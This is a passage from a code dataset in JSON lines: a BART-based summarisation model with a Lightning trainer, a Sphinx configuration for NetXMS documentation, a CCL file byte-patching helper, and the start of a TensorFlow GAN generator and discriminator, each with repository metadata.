lm_logits.view(-1, self.config.vocab_size), labels.view(-1)\n )\n\n if not return_dict:\n output = (lm_logits,) + outputs[1:]\n return (\n ((masked_lm_loss,) + output) if masked_lm_loss is not None else output\n )\n\n return Seq2SeqLMOutput(\n loss=masked_lm_loss,\n logits=lm_logits,\n past_key_values=outputs.past_key_values,\n decoder_hidden_states=outputs.decoder_hidden_states,\n decoder_attentions=outputs.decoder_attentions,\n cross_attentions=outputs.cross_attentions,\n encoder_last_hidden_state=outputs.encoder_last_hidden_state,\n encoder_hidden_states=outputs.encoder_hidden_states,\n encoder_attentions=outputs.encoder_attentions,\n )\n\n # 下面这个函数在beam search的最开始的时候会调用\n def prepare_inputs_for_generation(\n self,\n decoder_input_ids,\n past=None,\n attention_mask=None,\n head_mask=None,\n use_cache=None,\n encoder_outputs=None,\n **kwargs,\n ):\n # cut decoder_input_ids if past is used #\n if past is not None:\n decoder_input_ids = decoder_input_ids[:, -1:]\n\n if kwargs.get(\"labels\", None) != None:\n kwargs.pop(\"labels\")\n\n return {\n \"input_ids\": None, # encoder_outputs is defined. input_ids not needed\n \"encoder_outputs\": encoder_outputs,\n \"past_key_values\": past,\n \"decoder_input_ids\": decoder_input_ids,\n \"attention_mask\": attention_mask,\n \"head_mask\": head_mask,\n \"use_cache\": use_cache, # change this to avoid caching (presumably for debugging)\n **kwargs,\n }\n\n def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor):\n return shift_tokens_right(\n labels, self.config.pad_token_id, self.config.decoder_start_token_id\n )\n\n @staticmethod\n def _reorder_cache(past, beam_idx): # 然后再modelforward之后调用这个函数\n reordered_past = () # 这里的beam_idx使用的是选择的beam的id\n for layer_past in past:\n # cached cross_attention states don't have to be reordered -> they are always the same\n reordered_past += (\n tuple(\n past_state.index_select(0, beam_idx)\n for past_state in layer_past[:2]\n )\n + layer_past[2:],\n )\n return reordered_past\n\n # for beam_search\n\n @staticmethod\n def _expand_inputs_for_generation( # generate step 2 在初始化beam_scorer之后\n input_ids, # 此时的input_ids变成了之前预备需要输入的那个batchsize 个0\n expand_size: int = 1, # 这个是5 应该是beam_num\n is_encoder_decoder: bool = False,\n attention_mask: torch.LongTensor = None, # 这个attention_mask还是之前的那个\n encoder_outputs: DualBaseModelOutput = None,\n **model_kwargs,\n ) -> Tuple[torch.LongTensor, Dict[str, Any]]:\n expanded_return_idx = (\n torch.arange(input_ids.shape[0])\n .view(-1, 1)\n .repeat(1, expand_size)\n .view(-1)\n .to(input_ids.device)\n ) # 5 个beam 4个sample 每个samaple对应5个beam\n input_ids = input_ids.index_select(0, expanded_return_idx) #\n if \"token_type_ids\" in model_kwargs:\n token_type_ids = model_kwargs[\"token_type_ids\"]\n model_kwargs[\"token_type_ids\"] = token_type_ids.index_select(\n 0, expanded_return_idx\n )\n\n if attention_mask is not None:\n if isinstance(attention_mask, list):\n model_kwargs[\"attention_mask\"] = [\n m.index_select(0, expanded_return_idx) for m in attention_mask\n ]\n else:\n model_kwargs[\"attention_mask\"] = attention_mask.index_select(\n 0, expanded_return_idx\n )\n\n # if 'special_tokens_mask' in model_kwargs.keys() is not None:\n # model_kwargs['special_tokens_mask'] = model_kwargs['special_tokens_mask'].index_select(0,expanded_return_idx)\n # 下面就是把能扩展的部分对应扩展到对应份数\n if is_encoder_decoder:\n assert encoder_outputs is not None\n device = encoder_outputs[0].device\n if \"last_hidden_state\" in encoder_outputs.keys():\n encoder_outputs[\"last_hidden_state\"] = encoder_outputs[\n \"last_hidden_state\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"low_encoder_last_hidden_state\" in encoder_outputs.keys():\n encoder_outputs[\"low_encoder_last_hidden_state\"] = encoder_outputs[\n \"low_encoder_last_hidden_state\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"high_encoder_last_hidden_state\" in encoder_outputs.keys():\n encoder_outputs[\"high_encoder_last_hidden_state\"] = encoder_outputs[\n \"high_encoder_last_hidden_state\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"high_encoder_attention_mask\" in encoder_outputs.keys():\n encoder_outputs[\"high_encoder_attention_mask\"] = encoder_outputs[\n \"high_encoder_attention_mask\"\n ].index_select(0, expanded_return_idx.to(device))\n if \"low_encoder_attention_mask\" in encoder_outputs.keys():\n encoder_outputs[\"low_encoder_attention_mask\"] = encoder_outputs[\n \"low_encoder_attention_mask\"\n ].index_select(0, expanded_return_idx.to(device))\n\n model_kwargs[\"encoder_outputs\"] = encoder_outputs\n return input_ids, model_kwargs\n\n def estimate_tokens(self, input_dict: Dict[str, Union[torch.Tensor, Any]]) -> int:\n \"\"\"\n Helper function to estimate the total number of tokens from the model inputs.\n\n Args:\n inputs (:obj:`dict`): The model inputs.\n\n Returns:\n :obj:`int`: The total number of tokens.\n \"\"\"\n token_inputs = [tensor for key, tensor in input_dict.items() if \"input\" in key]\n if token_inputs:\n ret = 0\n for token_input in token_inputs:\n if isinstance(token_input, list) and isinstance(\n token_input[0], torch.Tensor\n ):\n ret += sum([_token_input.numel() for _token_input in token_input])\n elif isinstance(token_input, torch.Tensor):\n ret += token_input.numel()\n return ret\n else:\n warnings.warn(\n \"Could not estimate the number of tokens of the input, floating-point operations will not be computed\"\n )\n return 0\n\n def _prepare_decoder_input_ids_for_generation(\n self,\n input_ids: torch.LongTensor,\n decoder_start_token_id: int = None,\n bos_token_id: int = None,\n ) -> (\n torch.LongTensor\n ): # 这里的input_ids 就是baseline的input# decoder_start_token_id & bos = 0\n decoder_start_token_id = self._get_decoder_start_token_id(\n decoder_start_token_id, bos_token_id\n )\n if isinstance(input_ids, list):\n bs = len(input_ids)\n device = input_ids[0].device\n else:\n bs = input_ids.shape[0]\n device = input_ids.device\n decoder_input_ids = (\n torch.ones((bs, 1), dtype=torch.long, device=device)\n * decoder_start_token_id\n )\n return decoder_input_ids\n # 上面的这个函数就是只有进行一个初始化batch size个初始token\n\n\nclass plModel(LightningModule):\n def __init__(self, cfg):\n super(plModel, self).__init__()\n self.cfg = cfg\n path = os.path.join(cfg.hyperparam.models_ckpt_dir, cfg.model.backbone_type)\n config = AutoConfig.from_pretrained(path)\n self.tokenizer = AutoTokenizer.from_pretrained(path)\n self.model = TagBart.from_pretrained(path, config=config, cfg=cfg)\n\n def forward(self, inputs):\n return self.model(**inputs)\n\n def training_step(self, batch, batch_idx):\n batch = self.shared_step(batch)\n loss = self.model(**batch)[0]\n if self.cfg.hyperparam.use_wandb:\n wandb.log({\"train_loss\": loss})\n self.log(\"train_loss\", loss, prog_bar=True)\n\n return loss\n\n def test_step(self, batch, batch_idx):\n self.validation_step(batch, batch_idx)\n\n def validation_step(self, batch: dict, batch_idx):\n gen_kwargs = {\n \"max_length\": 100,\n \"min_length\": 5,\n \"num_beams\": self.cfg.hyperparam.num_beams,\n # \"synced_gpus\": True if is_deepspeed_zero3_enabled() else False,\n }\n batch = self.shared_step(batch)\n if self.cfg.model.model_type == \"baseline\":\n generated_tokens = self.model.generate(\n batch[\"input_ids\"],\n attention_mask=batch[\"attention_mask\"],\n **gen_kwargs,\n )\n\n else: # TODO\n pass\n\n if generated_tokens.shape[-1] < gen_kwargs[\"max_length\"]:\n generated_tokens = self._pad_tensors_to_max_len(\n generated_tokens, gen_kwargs[\"max_length\"]\n )\n has_labels = batch.get(\"labels\", None)\n with torch.no_grad():\n outputs = self.model(**batch)\n if has_labels is not None:\n loss = (\n (outputs[\"loss\"] if isinstance(outputs, dict) else outputs[0])\n .mean()\n .detach()\n )\n else:\n loss = None\n labels = batch[\"labels\"]\n if labels.shape[-1] < gen_kwargs[\"max_length\"]:\n labels = self._pad_tensors_to_max_len(labels, gen_kwargs[\"max_length\"])\n\n result = self.compute_metrics((generated_tokens, labels))\n print(result)\n return (loss, generated_tokens, labels)\n\n def postprocess_text(self, preds, labels):\n preds = [pred.strip() for pred in preds]\n labels = [label.strip() for label in labels]\n preds = [\"\\n\".join(nltk.sent_tokenize(pred)) for pred in preds]\n labels = [\"\\n\".join(nltk.sent_tokenize(label)) for label in labels]\n return preds, labels\n\n def compute_metrics(self, eval_preds):\n preds, labels = eval_preds\n preds = preds.detach().cpu()\n labels = labels.detach().cpu()\n if isinstance(preds, tuple):\n preds = preds[0]\n decoded_preds = self.tokenizer.batch_decode(preds, skip_special_tokens=True)\n # if self.cfg.hyperparam.label_pad_id:\n # # Replace -100 in the labels as we can't decode them.\n # labels = np.where(labels != 1, labels, self.tokenizer.pad_token_id)\n decoded_labels = self.tokenizer.batch_decode(labels, skip_special_tokens=True)\n\n # Some simple post-processing\n decoded_preds, decoded_labels = self.postprocess_text(\n decoded_preds, decoded_labels\n )\n\n result = {}\n metrics_ls = [get_rouge_score] # ,get_bert_score,get_meteor_score]\n for metrics in metrics_ls:\n res = metrics(decoded_preds, decoded_labels)\n result.update(res)\n # keys: rouge-1(f,p,r),rouge-2,rouge-l,bert_p,bert_r,bert_f,meteor\n # Extract a few results from ROUGE\n result[\"rouge-1\"] = result[\"rouge-1\"][\"f\"] * 100\n result[\"rouge-2\"] = result[\"rouge-2\"][\"f\"] * 100\n result[\"rouge-l\"] = result[\"rouge-l\"][\"f\"] * 100\n\n prediction_lens = [\n np.count_nonzero(pred != self.tokenizer.pad_token_id) for pred in preds\n ]\n result[\"gen_len\"] = np.mean(prediction_lens)\n result = {k: round(v, 4) for k, v in result.items()}\n return result\n\n def _pad_tensors_to_max_len(self, tensor, max_length):\n if self.tokenizer is None:\n raise ValueError(\n f\"Tensor need to be padded to `max_length={max_length}` but no tokenizer was passed when creating \"\n \"this `Trainer`. Make sure to create your `Trainer` with the appropriate tokenizer.\"\n )\n # If PAD token is not defined at least EOS token has to be defined\n pad_token_id = (\n self.tokenizer.pad_token_id\n if self.tokenizer.pad_token_id is not None\n else self.tokenizer.eos_token_id\n )\n\n padded_tensor = pad_token_id * torch.ones(\n (tensor.shape[0], max_length), dtype=tensor.dtype, device=tensor.device\n )\n padded_tensor[:, : tensor.shape[-1]] = tensor\n return padded_tensor\n\n def shared_step(self, batch):\n batch[\"labels\"] = batch[\"decoder_input_ids\"]\n for k in batch.keys():\n batch[k] = batch[k].to(self.device)\n return batch\n\n def configure_optimizers(self):\n steps = (\n self.cfg.dataset.train_dataset_len\n // self.cfg.hyperparam.train_batch_size\n // self.cfg.hyperparam.gradient_accumulation_step\n * self.cfg.hyperparam.train_epochs\n )\n optimizer = AdamW(\n self.model.parameters(),\n lr=self.cfg.optimizer.lr,\n eps=self.cfg.optimizer.eps,\n weight_decay=self.cfg.optimizer.weight_decay,\n )\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=self.cfg.scheduler.warmup_steps,\n num_training_steps=steps,\n )\n return [optimizer], [{\"scheduler\": scheduler, \"interval\": \"step\"}]\n\n def confgiure_callbacks(self):\n save_name = \"{}-{}-{}-{}.pt\".format(\n time.localtime().tm_mon,\n time.localtime().tm_mday,\n time.localtime().tm_hour,\n time.localtime().tm_min,\n )\n callbacks = saveCallBack(self.cfg, save_name, mode=self.cfg.hyperparam.mode)\n return [callbacks]\n", "repo_name": "kui253/Entity_with_utt_graph", "sub_path": "src/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 46084, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 43, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 52, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartLearnedPositionalEmbedding", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartDecoderLayer", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.LayerNorm", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart._make_causal_mask", "line_number": 91, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart._expand_mask", "line_number": 99, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart._expand_mask", "line_number": 239, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 249, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "random.uniform", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.utils.checkpoint.checkpoint", "line_number": 296, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 296, "usage_type": "attribute"}, {"api_name": "transformers.modeling_outputs.BaseModelOutputWithPastAndCrossAttentions", "line_number": 352, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 361, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 371, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 371, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 371, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 371, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 380, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 385, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 385, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartLearnedPositionalEmbedding", "line_number": 389, "usage_type": "call"}, {"api_name": "torch.nn.ModuleList", "line_number": 393, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 393, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartEncoderLayer", "line_number": 394, "usage_type": "call"}, {"api_name": "torch.nn.LayerNorm", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 396, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 482, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 482, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 482, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart._expand_mask", "line_number": 489, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 503, "usage_type": "call"}, {"api_name": "torch.utils.checkpoint.checkpoint", "line_number": 520, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 520, "usage_type": "attribute"}, {"api_name": "transformers.modeling_outputs.BaseModelOutput", "line_number": 550, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 559, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 560, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 563, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 563, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.shift_tokens_right", "line_number": 613, "usage_type": "call"}, {"api_name": "transformers.modeling_outputs.BaseModelOutput", "line_number": 646, "usage_type": "argument"}, {"api_name": "model_utils.DualBaseModelOutput", "line_number": 649, "usage_type": "argument"}, {"api_name": "transformers.modeling_outputs.Seq2SeqModelOutput", "line_number": 672, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.BartPretrainedModel", "line_number": 684, "usage_type": "name"}, {"api_name": "transformers.models.bart.modeling_bart.BartConfig", "line_number": 688, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 692, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 694, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 694, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 706, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 706, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 716, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 720, "usage_type": "call"}, {"api_name": "transformers.models.bart.modeling_bart.shift_tokens_right", "line_number": 756, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 782, "usage_type": "call"}, {"api_name": "transformers.modeling_outputs.Seq2SeqLMOutput", "line_number": 793, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 834, "usage_type": "attribute"}, {"api_name": "transformers.models.bart.modeling_bart.shift_tokens_right", "line_number": 835, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 860, "usage_type": "attribute"}, {"api_name": "model_utils.DualBaseModelOutput", "line_number": 861, "usage_type": "name"}, {"api_name": "torch.arange", "line_number": 865, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 863, "usage_type": "name"}, {"api_name": "torch.LongTensor", "line_number": 863, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 863, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 863, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 918, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 918, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 918, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 918, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 933, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 936, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 947, "usage_type": "attribute"}, {"api_name": "torch.ones", "line_number": 963, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 963, "usage_type": "attribute"}, {"api_name": "torch.LongTensor", "line_number": 951, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.LightningModule", "line_number": 970, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 974, "usage_type": "call"}, {"api_name": "os.path", "line_number": 974, "usage_type": "attribute"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 975, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 975, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 976, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 976, "usage_type": "name"}, {"api_name": "wandb.log", "line_number": 986, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 1017, "usage_type": "call"}, {"api_name": "nltk.sent_tokenize", "line_number": 1038, "usage_type": "call"}, {"api_name": "nltk.sent_tokenize", "line_number": 1039, "usage_type": "call"}, {"api_name": "global_utils.get_rouge_score", "line_number": 1060, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 1071, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1073, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 1090, "usage_type": "call"}, {"api_name": "transformers.optimization.AdamW", "line_number": 1109, "usage_type": "call"}, {"api_name": "transformers.optimization.get_linear_schedule_with_warmup", "line_number": 1115, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1124, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1125, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1126, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 1127, "usage_type": "call"}, {"api_name": "model_utils.saveCallBack", "line_number": 1129, "usage_type": "call"}]} +{"seq_id": "26495947385", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport sphinx.builders.manpage\nimport docutils.nodes\nimport os\nimport glob\nfrom os.path import basename\n\n# -- General configuration ------------------------------------------------\nproduct_name = os.environ.get('PRODUCT', 'NetXMS')\nproduct_key = product_name.replace(' ', '-').lower()\nrst_epilog = '.. |product_name| replace:: %s' % product_name\n\nprint((os.path.abspath('../_lib')))\nsys.path.insert(0, os.path.abspath('../_lib'))\n\nextensions = [\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.todo',\n 'sphinx.ext.ifconfig',\n 'wikipedia',\n]\n\ntemplates_path = ['../_templates']\n\nsource_suffix = '.rst'\nmaster_doc = 'index'\n\nproject_author = \"Raden Solutions, SIA\"\ncopyright = '2023, ' + project_author\n\nversion = '4.4'\nrelease = '4.4.3'\n\nexclude_patterns = ['build']\n\npygments_style = 'sphinx'\n\nlocale_dirs = ['_locale']\n\ntodo_include_todos = False\n\n# -- Options for HTML output ----------------------------------------------\nhtml_short_title = \"Home\"\n\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\nif on_rtd:\n html_theme = 'default'\nelse:\n import sphinx_rtd_theme\n html_theme = 'sphinx_rtd_theme'\n\n#html_logo = '_images/logo.png'\nhtml_favicon = '../favicon.ico'\nhtml_static_path = ['_static']\nhtml_show_sourcelink = False\nhtml_show_sphinx = False\n#html_show_copyright = True\n\nif 'CI' in os.environ:\n html_js_files = [('https://stats.raden.solutions/script.js', {'async': 'async', 'data-website-id':'e5a25886-8178-4d34-860f-f8cb9009a7e7'})]\n\n# -- Options for LaTeX output ---------------------------------------------\n# 'figure_align': 'H', - to avoid image floating to next page if it does not fit\nlatex_elements = {\n 'papersize': 'a4paper',\n 'pointsize': '8t',\n 'figure_align': 'H',\n}\n\n#latex_elements = {\n# 'papersize': '',\n# 'fontpkg': '',\n# 'fncychap': '',\n# 'maketitle': '\\\\cover',\n# 'pointsize': '',\n# 'preamble': '',\n# 'releasename': \"\",\n# 'babel': '',\n# 'printindex': '',\n# 'fontenc': '',\n# 'inputenc': '',\n# 'classoptions': '',\n# 'utf8extra': '',\n#}\n#latex_additional_files = [\"../netxms.sty\" ]\n\nlatex_show_pagerefs = False\nlatex_domain_indices = False\nlatex_use_modindex = False\n\n#latex_logo = '_images/logo.png'\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# If true, show page references after internal links.\n#latex_show_pagerefs = False\n\n# If true, show URL addresses after external links.\n#latex_show_urls = False\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_domain_indices = True\n\n# -- PlantUML settings ---------------------------------------------------------\n\nplantuml = '/usr/bin/java -Djava.awt.headless=true -jar ../_lib/plantuml.jar'\nplantuml_latex_output_format = 'pdf'\n\n# -- Custom code ---------------------------------------------------------------\ndef add_man_header_nodes(app, doctree, docname):\n if isinstance(app.builder, sphinx.builders.manpage.ManualPageBuilder):\n doctree.insert(0, docutils.nodes.raw('', '.if n .ad l\\n.nh\\n', format='manpage'))\n\ndef setup(app):\n # fix hyphenation in generated man pages\n app.connect('doctree-resolved', add_man_header_nodes)\n\n # ignore custom modules except listed in $MODULES\n modules = os.environ['MODULES'].split(',') if 'MODULES' in os.environ else []\n extDirs = glob.glob('source/extensions/*')\n for module in modules:\n extDirs = [d for d in extDirs if module.strip() not in d]\n for d in extDirs:\n exclude_patterns.append(d[7:]) # remove 'source/'\n\n app.add_css_file(\"theme_overrides.css\")\n if product_name == 'NetXMS':\n app.add_config_value('release_type', 'oss', 'env')\n else:\n app.add_config_value('release_type', 'ee', 'env')\n\n# -- Options for Epub output ----------------------------------------------\n\n# Bibliographic Dublin Core info.\nepub_author = project_author\nepub_publisher = project_author\nepub_copyright = copyright\n\nepub_theme = 'epub'\n\n# A list of files that should not be packed into the epub file.\nepub_exclude_files = ['search.html']\n\n\n", "repo_name": "netxms/netxms-doc", "sub_path": "conf.py", "file_name": "conf.py", "file_ext": "py", "file_size_in_byte": 4165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 46, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 60, "usage_type": "attribute"}, {"api_name": "sphinx.builders.manpage.builders", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sphinx.builders.manpage", "line_number": 117, "usage_type": "name"}, {"api_name": "docutils.nodes.nodes.raw", "line_number": 118, "usage_type": "call"}, {"api_name": "docutils.nodes.nodes", "line_number": 118, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 118, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 125, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "26437173701", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 13 14:52:45 2020\n\n@author: AsteriskAmpersand\n\"\"\"\nfrom col.Ccl import CCL\nfrom common.FileLike import FileLike\n\nclass CclCompatibilizer():\n def compatibilize(self,cclPath):\n with open(cclPath,\"rb\") as cclFile:\n c = CCL()\n c.marshall(FileLike(cclFile.read()))\n self.updateCursedBytes(c)\n with open(cclPath,\"wb\") as cclFile:\n cclFile.write(c.serialize())\n \n def updateCursedBytes(self,cclData):\n for record in cclData.Records:\n for ix,i in enumerate(record.unknownFrontBytesCont):\n if ix>0:\n if i == 0:\n record.unknownFrontBytesCont[ix] = -51\n for ix,i in enumerate(record.unknownEndBytes):\n if ix>11:\n if i == 0:\n record.unknownEndBytes[ix] = -51 \n ", "repo_name": "AsteriskAmpersand/Hyperthermia-MHW-IB-Converter", "sub_path": "compatibility/cclCompatibility.py", "file_name": "cclCompatibility.py", "file_ext": "py", "file_size_in_byte": 937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "col.Ccl.CCL", "line_number": 13, "usage_type": "call"}, {"api_name": "common.FileLike.FileLike", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "5472731335", "text": "import tensorflow as tf\nimport tensorflow_addons as tfa\nimport tensorflow.keras as keras\n\ndef _get_norm_layer(norm):\n if norm == None:\n return lambda: lambda x : x\n elif norm == 'batch_norm':\n return keras.layers.BatchNormalization()\n elif norm == 'instance_norm':\n return tfa.layers.InstanceNormalization()\n elif norm == 'layer_norm':\n return keras.layers.LayerNormalization()\n else:\n raise ValueError('Normalization not found')\n\n\nclass ResBlock(keras.layers.Layer):\n def __init__(self, dim, padding, norm):\n super(ResBlock, self).__init__()\n self.res_block = self.build_res_block(dim, padding, norm)\n\n def build_res_block(self, dim, padding, norm):\n res_block = []\n res_block += [\n keras.layers.Conv2D(dim, 3, padding=padding),\n _get_norm_layer(norm),\n keras.layers.ReLU()\n ]\n\n res_block += [\n keras.layers.Conv2D(dim, 3, padding=padding),\n _get_norm_layer(norm)\n ]\n return keras.Sequential(res_block)\n\n def call(self, x):\n return self.res_block(x) + x\n\nclass ResGenerator(keras.Model):\n def __init__(self, input_nc, output_nc, fmaps, norm=\"instance_norm\", n_blocks=9, padding=\"same\", n_downsampling=2):\n \"\"\" Constructe a resnet generator\n \n Parameters: \n input_nc (int) -- the number of channels of input images\n output_nc (int) -- the number of channels of output images\n fmaps (int) -- the base number of feature maps\n netG (str) -- the name of model\n norm (str) -- normalization layer: batch_norm | instance_norm | layer_norm\n n_blocks (int) -- the number of resnet block\n padding (str) -- padding type: valid | same\n \"\"\"\n super(ResGenerator, self).__init__()\n assert(n_blocks >= 0)\n \n \"\"\" 1 \"\"\"\n model = [\n keras.layers.Conv2D(fmaps, 7, strides=1, padding=padding),\n _get_norm_layer(norm),\n keras.layers.ReLU()\n ]\n \"\"\" downsampling \"\"\"\n for _ in range(n_downsampling):\n fmaps *= 2\n model += [\n keras.layers.Conv2D(fmaps, 3, strides=2, padding=padding),\n _get_norm_layer(norm),\n keras.layers.ReLU()\n ]\n\n \"\"\" resblock \"\"\"\n for _ in range(n_blocks):\n model += [ResBlock(fmaps, padding, norm)]\n\n \"\"\" upsampling \"\"\"\n for _ in range(n_downsampling):\n fmaps //= 2\n model += [\n keras.layers.Conv2DTranspose(fmaps, 3, strides=2, padding=padding),\n _get_norm_layer(norm),\n keras.layers.ReLU()\n ]\n \n \"\"\" 2 \"\"\"\n model += [\n keras.layers.Conv2D(output_nc, 7, padding=padding),\n keras.layers.Activation('tanh')\n ]\n self.model = keras.Sequential(model)\n\n def call(self, x):\n return self.model(x)\n\nclass NLayerDiscriminator(keras.Model):\n \"\"\"\" PatchGAN Discriminator \"\"\"\n def __init__(self, input_nc, fmaps, padding, n_layers=3, norm='batch_norm'):\n \"\"\" Construct a PatchGAN discriminator\n\n Parameters:\n input_nc (int) -- the number of channel of input image\n fmaps (int) -- the number of channel of feature maps\n netD (str) -- the name of model\n n_layers (int) -- the number of conv\n norm (str) -- normalization layer: batch_norm | instance_norm | layer_norm\n \"\"\"\n super(NLayerDiscriminator, self).__init__()\n _fmaps = fmaps\n\n # norm_layer = _get_norm_layer(norm)\n \n model = []\n for i in range(n_layers):\n fmaps = min(fmaps*2, _fmaps*8)\n model += [\n keras.layers.Conv2D(fmaps, 4, strides=2, padding=padding),\n _get_norm_layer(norm),\n keras.layers.LeakyReLU(alpha=0.2)\n ]\n \n model += [\n keras.layers.Conv2D(fmaps, 4, strides=1, padding=padding),\n 